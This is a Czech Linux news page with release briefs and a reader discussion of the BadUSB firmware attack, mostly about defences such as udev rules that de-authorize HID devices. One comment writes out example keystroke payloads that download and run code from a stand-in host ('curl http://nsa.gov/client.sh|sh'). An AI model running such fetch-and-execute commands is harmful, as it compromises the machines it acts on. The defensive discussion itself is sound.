OpenJS Foundation, oficiální projekt konsorcia Linux Foundation, oznámila vydání verze 22 otevřeného multiplatformního prostředí pro vývoj a běh síťových aplikací napsaných v JavaScriptu Node.js (Wikipedie). V říjnu se verze 22 stane novou aktivní LTS verzí. Podpora je plánována do dubna 2027.
Byla vydána verze 8.2 open source virtualizační platformy Proxmox VE (Proxmox Virtual Environment, Wikipedie) založené na Debianu. Přehled novinek v poznámkách k vydání a v informačním videu. Zdůrazněn je průvodce migrací hostů z VMware ESXi do Proxmoxu.
R (Wikipedie), programovací jazyk a prostředí určené pro statistickou analýzu dat a jejich grafické zobrazení, bylo vydáno ve verzi 4.4.0. Její kódové jméno je Puppy Cup.
IBM kupuje společnost HashiCorp (Terraform, Packer, Vault, Boundary, Consul, Nomad, Waypoint, Vagrant, …) za 6,4 miliardy dolarů, tj. 35 dolarů za akcii.
Byl vydán TrueNAS SCALE 24.04 “Dragonfish”. Přehled novinek této open source storage platformy postavené na Debianu v poznámkách k vydání.
Oznámeny byly nové Raspberry Pi Compute Module 4S. Vedle původní 1 GB varianty jsou nově k dispozici také varianty s 2 GB, 4 GB a 8 GB paměti. Compute Modules 4S mají na rozdíl od Compute Module 4 tvar a velikost Compute Module 3+ a předchozích. Lze tak provést snadný upgrade.
Po roce vývoje od vydání verze 1.24.0 byla vydána nová stabilní verze 1.26.0 webového serveru a reverzní proxy nginx (Wikipedie). Nová verze přináší řadu novinek. Podrobný přehled v souboru CHANGES-1.26.
Byla vydána nová verze 6.2 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Přehled změn v příslušném seznamu. Tor Browser byl povýšen na verzi 13.0.14.
Byla vydána nová verze 30.0.0 frameworku pro vývoj multiplatformních desktopových aplikací pomocí JavaScriptu, HTML a CSS Electron (Wikipedie, GitHub). Chromium bylo aktualizováno na verzi 124.0.6367.49, V8 na verzi 12.4 a Node.js na verzi 20.11.1. Electron byl původně vyvíjen pro editor Atom pod názvem Atom Shell. Dnes je na Electronu postavena celá řada dalších aplikací.
Byla vydána nová verze 9.0.0 otevřeného emulátoru procesorů a virtualizačního nástroje QEMU (Wikipedie). Přispělo 220 vývojářů. Provedeno bylo více než 2 700 commitů. Přehled úprav a nových vlastností v seznamu změn.
V srpnu na konferenci Black Hat USA 2014 představili Karsten Nohl a Jakob Lell relativně nový typ útoku, kdy lze ke kompromitaci počítače použít libovolné USB zařízení (pdf, YouTube). Útok byl pojmenován dle názvu přednášky BadUSB a spočívá v přeprogramování firmwaru USB zařízení. Minulý týden na konferenci DerbyCon 4.0 o BadUSB přednášeli Adam Caudill a Brandon Wilson (YouTube). Na rozdíl od předchozí dvojice se ale tato dvojice rozhodla zveřejnit zdrojový kód (GitHub).
Tiskni
Sdílej:
5.10.2014 13:05
Bedňa | skóre: 34
| blog: Žumpa
| Horňany
5.10.2014 13:10
Jardík | skóre: 40
| blog: jarda_bloguje
5.10.2014 13:22
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Jak útok probíháDo řadiče USB flashdisku je nahrán alternativní firmware, který občas po připojení emuluje klávesnici, která namačká buď
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
Win+R, iexplore http://nsa.gov/client.exe, Enter, Enter, Enter, nebo Alt+F2, curl http://nsa.gov/client.sh|sh, Enter, nebo obecný shell payload.
jestli je to jen záležitost WindowsJe to záležitostí všech sračkových operačních systémů, které po připojení USB klávesnice z této automaticky začnou číst klávesy. Tedy i Linuxu, pokud si ho nějak extra nepatchneš. Proti necílenému útoku by mohlo pomoci mít nestandardní klávesové zkratky a doufat, že se to nespustí zrovna když jsi v terminálu.
5.10.2014 13:37
Hans1024 | skóre: 5
| blog: hansovo
5.10.2014 13:55
Hans1024 | skóre: 5
| blog: hansovo
Napadá mě jedině, že se od klávesnice po její autorizaci uloží někam i její identifikační údaje - nejsou údaje = nepracuje...
jo, to by mi přišlo jako celkem rozumný způsob, první připojená klávesnice bez dotazu a při druhé a další dotaz požadovat potvrzení,To je dobre reseni az do okamziku, kdy se vam jedna klavesnice rozbije, budete chtit pripojit nahradni a ta rozbita je pevne integrovana (jako napr. u notebooku).
6.10.2014 10:37
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
6.10.2014 11:34
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.10.2014 13:25
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
zároveň mi taky nic nebereNeklesá vám číslo "peněz na účtu celkem". To "nebere" je sporné - jestli banka díky těm penězům něco vydělává (což vydělává a nebude to málo), tak by vám z toho mělo něco kápnout, ne? Třeba aspoň dorovnání inflace.
6.10.2014 17:27
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Neklesá vám číslo "peněz na účtu celkem". To "nebere" je sporné - jestli banka díky těm penězům něco vydělává (což vydělává a nebude to málo), tak by vám z toho mělo něco kápnout, ne? Třeba aspoň dorovnání inflace.Viz ta první věta;
Já dostávám nějaké drobnéTo je něco jako softwarové pirátství - pro mě je to co s těma penězma banka dělá naprosto virtuální a v podstatě se mě to vůbec netýká. Spokojím se s tím, že mi poskytuje služby, které od ní očekávám, že je pojištěná a že jsou tam obecně peníze bezpečnější, než u mě doma pod postelí. Samozřejmě, je hezké, když mi jednou měsíčně přičtou dvacet halířů, ale v podstatě mě to ani nezajímá. V objemech toků peněz, které každý den utrácím a které dostávám od zaměstnavatele je to v podstatě neviditelná částka.
Spokojím se s tím, že mi poskytuje služby, které od ní očekávám, že je pojištěná a že jsou tam obecně peníze bezpečnější, než u mě doma pod postelí.Je fajn, že se spokojíte, ale to nic nemění na tom, že služby nedostáváte zadarmo. Cena těch služeb je rozdíl mezi penězmi, které váš vklad do banky té bance vydělal, a penězmi, které jste za to dostal (těch pár halířů). Že ten rozdíl nikdy nevidíte jako částku na výpisu z účtu, na věci taky nic nemění. Banka má samozřejmě nějaké náklady, takže vám nikdy nemůže dát všechno, co váš vklad vydělal. No a mezi ty náklady se počítají i peníze, o které banka přijde kvůli viz #48
6.10.2014 18:43
pavlix | skóre: 54
| blog: pavlix
Pokud se nekdo nechce nechat vykoristovat, nemusi techto sluzeb vyuzivat.A může zcela svobodně bydlet v jeskyni... oh wait, ani to nemůže.
6.10.2014 19:58
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Cena těch služeb je rozdíl mezi penězmi, které váš vklad do banky té bance vydělal,To je ale krajne uhozena argumentace. Vychazi z implicitniho predpokladu, ze onen zisk je prirozeny a automaticky dusledek toho vkladu a banka ho jen shrabne 'bez namahy'. Ve skutecnosti banka k zisku potrebuje minimalne ctyri veci: 1) kapital - ten primarne poskytuji investori 2) likviditu - tu primarne poskytuji vkladatele 3) investicni prilezitosti 4) infrastrukturu a know-how Samotne penize od vkladatelu zadny vynos neudelaji. A protoze v soucasne situaci maji banky obecne likvidity nadbytek (relativne k ostatnim faktorum), tak jeji mezni uzitecnost je mala a banky tedy nepotrebuji lakat dalsi vkladatele velkymi vynosy. Pokud ma smysl nejake jine meritko ceny, tak je to cena uslych prilezitosti. Tedy vynos, ktery by si ty sam s tema penezma mohl udelat, kdybys je nevlozil do banky. Jenze to je ve vetsine pripadu nominalni nula.
To je ale krajne uhozena argumentace. Vychazi z implicitniho predpokladu, ze onen zisk je prirozeny a automaticky dusledek toho vkladu a banka ho jen shrabne 'bez namahy'.Ten předpoklad jste si nicméně do mého příspěvku doplnil vy (a to, že je implicitní, je váš názor.) Já nic takového netvrdil
Cena těch služeb je rozdíl mezi penězmi, které váš vklad do banky té bance vydělal, a penězmi, které jste za to dostal (těch pár halířů).Zapoměl jste odečíst cenu práce. Ano, ono to stojí (nejen) něco lidských zdrojů, aby ten vklad do banky něco vydělal. A jen pro srovnání si představte, kolik lidských zdrojů by to stálo, kdybyste si to aby vaše vklady vydělávaly řešit sám. Takže si to shrneme: banka nabízí produkt, investuje do něj něj nějakou práci a má z toho nějaký zisk. Na vás je, jestli ten produkt je pro vás výhodný, bez ohledu na to, kolik ta banka z toho má. Pokud se najde dost lidí, kteří přejdou k bance která více svého zisku vrací a pokud to bude stále finančně výhodné pro tu banku (bude mít víc klientů), tak taková banka vznikne. To jsou pravidla trhu. Vezměme si jiný příklad. Pokud budou stejnou trasou jezdit dva dopravci. Jeden bude mít jízdné 100 Kč a při tom marží 1Kč. Druhý bude mít jízdné 50Kč a marži 40Kč (podaří se mu získat nějakou dotaci od státu, nebo tak něco). Kterého si vyberete? Toho s nižší marží?
7.10.2014 09:46
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Zapoměl jste odečíst cenu práce.Ta podle mě nebyla zahrnuta v tom které váš vklad do banky té bance vydělal, tj. mluvil o čistém zisku. Zbytek příspěvku mi přijde, že vůbec nereaguje na trekkera. Můžeš to zkusit upřesnit?
Pokud se najde dost lidí, kteří přejdou k bance která více svého zisku vrací a pokud to bude stále finančně výhodné pro tu banku (bude mít víc klientů), tak taková banka vznikne.Pokud jí v tom nebrání zákon - např. kdyby existoval zákon, který by nařizoval bance ukradené peníze hradit. Existuje? Nějaké rozsudky v tom smyslu tu už myslím byly.
Zapoměl jste odečíst cenu práce.Nezapomněl. Výdělek z vkladu zákazníka je pro banku příjem, do kterého se cena práce nazapočítává. Ta (a ostatní náklady) se počítá až do zisku, o kterém jsem ale nemluvil.
5.10.2014 19:19
Jendа | skóre: 78
| blog: Jenda
| JO70FB
a zbytečná ad hominem na Jednu...Mě hlavně překvapilo, že ví, že mám uhry. Nemám je totiž v obličeji…
5.10.2014 19:18
Jendа | skóre: 78
| blog: Jenda
| JO70FB
A co kdyz uzivatel nebude mit pripojenou mys a ani jine zarizeni?Zobrazí se: Pro aktivaci klávesnice na ní napište "bablbam". Malware na USB klíčence náhodné slovo z obrazovky nepřečte.
Uzivatel by nepochopil, ze se jedna o bezpecnostni vec, jen by si rekl, jak je ten Linux hloupy.Nevadí mi používat (bezpečný) systém, i když si o něm BFU budou myslet, že je hloupý.
6.10.2014 11:31
Jendа | skóre: 78
| blog: Jenda
| JO70FB
A zobrazi sa to kedy a kde? A kde sa to bude zobrazovat - na konzole? V X11?Na konzoli, v Xkách… podle toho, kde uživatel bude.
Pri kazdom boote systemu? Alebo si to bude pamatat, ktore klavesnice su povolene (podla coho - vacsina klavesnic nema v sebe seriove cislo)?USB ID může útočník fejkovat (pokud trefí stejného výrobce a model klávesnice), ale systém kromě toho vidí, do kterého portu, případně k jakému hubu je klávesnice připojena. Takže pokud uživatel nebude klávesnici přehazovat mezi USB porty, nemusí se to pokaždé ptát.
6.10.2014 13:28
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
USB ID může útočník fejkovat (pokud trefí stejného výrobce a model klávesnice), ale systém kromě toho vidí, do kterého portu, případně k jakému hubu je klávesnice připojena. Takže pokud uživatel nebude klávesnici přehazovat mezi USB porty, nemusí se to pokaždé ptát.Co si prostě rozdělit porty podle zařízení? Tzn vepředu na počítači mít porty třeba jen na mass storage a na nic jiného. Sice to nepomůže v případech ala "podvodná myš", ale vyřeší to půlku problému s podvodnými flashdisky, kterých bych se bál podstatně víc.
5.10.2014 19:16
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Vite, normalni clovek (ne uhrovity geek chodici do hackerspacu) ale ocekava, ze bude moci na klavesnici psat hned po pripojeni.Nejde to prostě bezpečně udělat. Stejně, jako nejde třeba bezpečně automaticky spouštět binárky z webových stránek. Prostě tam bude stejné vyskakovací okno jako když ve windowsech klikneš na neznámé .exe - Are you sure? Yes, no.
5.10.2014 21:19
pavlix | skóre: 54
| blog: pavlix
5.10.2014 21:20
pavlix | skóre: 54
| blog: pavlix
5.10.2014 21:56
Bedňa | skóre: 34
| blog: Žumpa
| Horňany
Tedy i Linuxu, pokud si ho nějak extra nepatchneš.Nestačilo by pravidlo do udevu?
udev obsluhovat mohl, nejspíš přes nějaký soubor v /sys. Šlo by tím nejen zajistit ochranu proti potvorám jako BadUSB, ale například také "zamknutí" všech vstupních zařízení, například podle toho, jestli je nějaké zařízení přítomné nebo ne.
Pro grafická prostředí by pak stačilo poslat zprávu skrz DBus, kde by naslouchal program, co by se na neznámé vstupní zařízení zeptal uživatele, který by ho následně mohl povolit (a nechat zapsat do seznamu povolených), povololit dočasně nebo ignorovat.
To by nejspíš u vstupních zařízení nepomohlo, vstupní vrstva začne pracovat hned, jak ze zařízení nahozeno.Viz tady - ten člověk sice řeší keymap, ale podobným způsobem by imho šlo zabránit takovým útokům... Zásah do jádra mi přijde overkill, spíš ten udev a/nebo xinput vrstva...
To by mohlo fungovat - i když by zařízení dál posílalo události stisků kláves, tak pokud by namapovaly "do nikam", byl by efekt stejný jako zahození. On to vlastně je "zásah do jádra", ale přes mechanismus, který tam už je.Přesně tak, IMHO už veškerá potřebná funkcionalita v jádře a v udevu je. IIRC nemusíš ani dělat hack s keymapem, mělo by jít usb zařízení odpojit zápisem vhodné hodnoty někam do
/sys/bus/usb/, ačkoli teď hned z hlavy nevim, co konkrétně zapsat kam...
echo 1 > /sys/bus/usb/devices/$USB_PATH/remove
Tohle u mě funguje a dá se to s trochou RTFM nechat zavolat z udev pravidla. IIRC by také mělo být možné požádat udev po D-Busu, aby něco odpojil, to koneckonců DE běžně dělají. Tzn. jediné, co zbývá, je napsat pár vhodných pravidel a přívětivé rozhraní
/sys/bus/usb/device/.../authorized (viz dokumentace jádra, je to hned ze začátku), tak zařízení zakázáno a ovladače ho nemohou používat. Je to původně pro použití s bezdrátovými USB zařízenímy, ale funguje to i u normálních "drátových" (je myšleno na úrovni protokolu, myš s přijímačem v USB je z tohoto pohledu stále "drátová"). Tudíž by stačilo udev pravidlo, které by všechna HID zařízení po připojení zakázala a znovu je autorizovala až po ověření uživatelem.
Nebo - pro maximální paranoiky a/nebo ty s PS/2 zařízeními - patchnout jádro, aby byla všechna HID zařízení defaultně neautorizovaná a musela se povolit dodatečně.
drivers/usb/core/hcd.c ukáže, že jádno netřeba patchovat (teda pokud nevadí, že to vypne všechny USB zařízení a ne jen HID, což asi stejně není od věci).
/* authorized_default behaviour:
* -1 is authorized for all devices except wireless (old behaviour)
* 0 is unauthorized for all devices
* 1 is authorized for all devices
*/
static int authorized_default = -1;
module_param(authorized_default, int, S_IRUGO|S_IWUSR);
MODULE_PARM_DESC(authorized_default,
"Default USB device authorization: 0 is not authorized, 1 is "
"authorized, -1 is authorized except for wireless USB (default, "
"old behaviour");
Ještě by to chtělo, aby se to víc používalo v userspace...
6.10.2014 00:02
Jendа | skóre: 78
| blog: Jenda
| JO70FB
5.10.2014 21:35
Jendа | skóre: 78
| blog: Jenda
| JO70FB
5.10.2014 19:24
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Nicméně by šlo dodělat dodatečnou vrstvu do jádraMně by na destopu stačilo, kdyby se to řešilo v Xkách. (k serverům jednak většinou nepřipojuju USB zařízení, druhak tam nebývá aktivní session)
5.10.2014 19:21
Jendа | skóre: 78
| blog: Jenda
| JO70FB
GreyDaemon ~ # cat /etc/udev/rules.d/blockusbhid.rules
ACTION=="add", ATTR{bInterfaceClass}=="03" RUN+="/bin/sh -c 'echo 0 >/sys$DEVPATH/../authorized'"
Problem solved. A vubec, kdyz zamykam screen spoustim:
sysctl -w kernel.grsecurity.deny_new_usb=1
5.10.2014 13:53
Hans1024 | skóre: 5
| blog: hansovo
Bezpecnostni problem ma v podstate 2 casti:
1. jak se muze infikovat firmware flashdisku:
Na linuxu je potreba root. Na windows je asi admin kazdy, ze?
2. jak muze flashka s infikovanym firmware ohrozit vas PC:
Prvnim utocnym vektorem, ktery se nabizi, je modifikace/infikovani souboru ukladanych na flashdisk. Dalsi moznosti utoku je chovat se jako jine zarizeni krome uloziste (jak popsali nademnou). Nekde na mailing listech se diskutovala jeste moznost modifikovat bezici OS pomoci DMA, ale samotna USB zarizeni nemuzou iniciovat DMA, takze by takovy utok byl nesmirne komplikovany.
Na windows je asi admin kazdy, ze?Už ne, tuhle část UNIXu po několika desítkách let zvládli okopírotvat...
5.10.2014 19:27
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Zas na druhej strane windows manager uz z principu potrebuje ovladat vsetky okna, takze ak by sa to malo nejak vyriesit, tak window manager by tiez musel mat rovnako silne prava ako nejak ta ad-hoc aplikacia na potvrenie ci chces vykonat danu operaciu.Ne, citlivý dialog může dočasně WM zablokovat. Tohle je prostě celé blbě. Podívejte se na Qubes OS, jak to má vypadat.
Ne, citlivý dialog může dočasně WM zablokovat.No ak nieco zastavi bez WM procesu, tak vsetky veci ako oramovanie okna a tlacidka na jeho zavretie prestanu fungovat... To tiez nie je dobre.
6.10.2014 10:25
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.10.2014 10:37
Hans1024 | skóre: 5
| blog: hansovo
6.10.2014 10:54
pavlix | skóre: 54
| blog: pavlix
6.10.2014 11:35
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.10.2014 12:38
Hans1024 | skóre: 5
| blog: hansovo
6.10.2014 17:41
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Jedna vec je duveryhodnost a druha vec je zranitelnost/exploitovatelnost.Aha. Tou „nedůvěryhodností“ jsem myslel normální aplikaci, kterou útočník exploitnul. Zmatení pojmů, pardon.
Pokud vam pripada pravdepodobnost exploitnuti prilis vysoka, jsou ruzne zpusoby jak appku sandboxovat a podporu ze strany Xserveru k tomu nepotrebujete.Potřebuju, protože když jí dám přístup na X server, může číst klávesy, schránku, screenshotovat a posílat keystroky ostatním aplikacím. Jsou proti tomu pochybná rozšíření do X.
6.10.2014 18:18
Hans1024 | skóre: 5
| blog: hansovo
6.10.2014 18:42
Jendа | skóre: 78
| blog: Jenda
| JO70FB
No pokud je u nejake appky riziko tak velke, tak bych ji ani nedaval pristup k X serveru.Browser, prohlížeč obrázků, PDF nebo přehrávač videa se dneska blbě spouští bez X serveru.
pousta aplikaci vyuziva cteni klaves, schranku, screenshotovani atd.U mně čte (oprávněně) klávesy jenom WM a schránku a screenshoty si můžu managovat bokem. Jak říkám, koukni na ten QubesOS.
6.10.2014 19:15
Hans1024 | skóre: 5
| blog: hansovo
Browser, prohlížeč obrázků, PDF nebo přehrávač videa se dneska blbě spouští bez X serveru.Lze pouzit treba Xephyr apod., nebo rovnou virtualni masinu.
U mně čte (oprávněně) klávesy jenom WM a schránku a screenshoty si můžu managovat bokem. Jak říkám, koukni na ten QubesOS.QubesOS znam, jde do extremu s virtualkama.
/dev/tty12). Uživatel uvidí, jako co je vložené zařízení detekováno a bude jasné, že pokud se například flashdisk ohlásí jako složené zařízení obsahující jedno mass storage a dvě HID, tak je nejspíš nakažené. Další výhoda neaktivního terminálu je to, že jakékliv akce s vyjímklou přepnutí terminálu a věcí typu Magic SysRq key nebo Ctr+Al+Del a spol. jsou ignorováný a navíc je uživatel uvidí.
Bohužel tato taktika selhává, pokud je zařízení už rovnou vstupní (jako Trójská myš) nebo začne své akce provádět až po nějaké době. Jediná obrana proti tomu by bylo mít "karanténí počítač", nejlépe nějaký systém nabootovaný z read-only média jako LiveCD, nepřipojenký k síti a nejlépe i ne-x86 (optimálně nějaká embedded deska s ARMem). Pokud by se k tomu přidala detekce veškerých vstupních odálostí (jako evtest, ale pro všechny existující zařízení) a nechalo se to běžet dostatečně dlouho (minimálně den), tak je velmi pravděpodobné, že by se tím odhalila většina infikovaných zařízení. Bylo by sice možné se takovéto detekci vyhnout, ale takto "opatrné" infikované zařízení by svou "infekci" šířilo jen velmi pomalu (u mallwaru není K-strategie moc výhodná).
6.10.2014 14:47
Bystroushaak | skóre: 36
| blog: Bystroushaakův blog
| Praha
Nebo mi nCo mi uniká? V čem je tenhle útok nový?Tak jak to chápu já; Nové je to v tom, že to aktivně útočí na flashdisky, do kterých nahrává upravený firmware. Dřívější útoky byly spíš stylem speciálně zkonstruovaného zařízení (například té myši), které po připojení počítač napadly. Nyní v podstatě libovolný flashdisk může představovat riziko, protože nezjistíš, jestli je nakažený nebo ne pouhým scannem jeho obsahu (infikovaný je řadič, ne diskový prostor).
6.10.2014 17:43
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Nebo mi nCo mi uniká? V čem je tenhle útok nový?Dřív ti musel útočník dát přímo zařízení, které uvnitř mělo HW na tohle. Teď to umí reflashnout různá zařízení bez fyzické úpravy útočníkem.
5.10.2014 19:30
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Jediná obrana je zřejmě brát produkty od známých výrobců, u kterých by ztráta pověsti přinesla větší ztráty než by byly nějaké zisky z podobných podvodů.Například od Sony nebo od Cisca.
5.10.2014 20:32
Heron | skóre: 53
| blog: root_at_heron
| Olomouc
Problém s tím, že se např. flashka začne chovat jako klávesnice, myš nebo kdo ví co, je celkem jednoduchá.
Tohle by nefungovalo, protože potom by přišel nějaký tydíít a začal by vysvětlovat, proč se USB 3G bazmek musí chovat nejdřív jako USB Mass Storage a až potom jako síťové zařízení (Pro vysvětlení, narážím tím na to, že místo toho, aby ta usb věc byla standardní a podporovaná by default, tak se na tu USB Storage část dává (beznadějně) zastaralý ovladač, který se nejdřív pokusí nainstalovat a potom ono zařízení přepne na 3G modem.)
Stejně tak myši, co jsou myši a současně usb mass storage. Uživatelé by vám vysvětlili, jak úžasná je to věc a jak moc tomu nerozumíte. (Pro vysvětlení: na tu usb storage část se ukládá .... konfigurace toho hw. Proč se konfigurace toho hw nemůže uložit do toho hw samotného, jak je desítky let zvykem je mi "záhadou". Ale dneska je asi lepší mít konfiguraci v usb mass storage na fatce a ve speciálním ovladači si ji přečíst a potom přes ovladač ovlivnit chování onoho hw.)
A vůbec, proč se bránit, když avirové firmy chtějí vydělávat. Tak jim to dopřejme, ne?
5.10.2014 21:34
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.10.2014 17:43
Jendа | skóre: 78
| blog: Jenda
| JO70FB
PPS: Naozaj má upravený BIOS väčší dopad na dnešné PC, ako upravené USB zariadenie?Ano (SMM).
ZADNY uzivatel naprosto NIKDY nesmi nic takovyho videt.Tohle je ta nejvetsi demence. Spravne reseni by bylo, kdyby to slo vypnout celkem jednoduse, pouze s dostatecnym varovanim. (A v nejmenovanem OS by na to melo byt API, ktere bude moct vyuzit antivir. At se snazi antivirove firmy, je to jejich job.) Mezi uzivateli at se siri co chce, dle jejich (ne)inteligence. Ale ve firmach, at je to na administratorovi, co povoli, co zakaze, a nebo jestli necha na uzivatelove zodpovednosti (pomoci vyse zmineneho dialogu), ze s tim pocitacem neco udela. Pripojit flashku a odnest si praci domu chce docela dost lidi, a porad je to lepsi nez si stomegove soubory posilat mejlem.
7.10.2014 09:49
Jendа | skóre: 78
| blog: Jenda
| JO70FB
ZADNY uzivatel naprosto NIKDY nesmi nic takovyho videt.Nejspíš podle tebe nejsem uživatel, tak s dovolením budu používat systém, který není pro takové uživatele. Jsou dle tebe špatné i hlášky když klikneš třeba na takovýto link, měl by to prohlížeč rovnou automaticky spustit?
7.10.2014 21:33
Petr Tomášek | skóre: 39
| blog: Vejšplechty
Ano, jde to udělat s jakýkoli HW. Ale je rozumné chtít po operačním systému, aby uměl připojit bezpečně např. něco, co na první pohled vypadá (podle obalu) jako USB Flash. Tedy se uživatele zeptal "Připojujete poprvé nové zařízení typu klávesnice. Opravdu tak chcete učinit?".
Což je úplně nejvtipnější, když žádná jiná klávesnice (ani krysa) k systému připojená není a uživatel nemá jak připojení klávesnice potvrdit .
7.10.2014 22:51
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
6.10.2014 20:28
Petr Tomášek | skóre: 39
| blog: Vejšplechty
6.10.2014 21:01
Hans1024 | skóre: 5
| blog: hansovo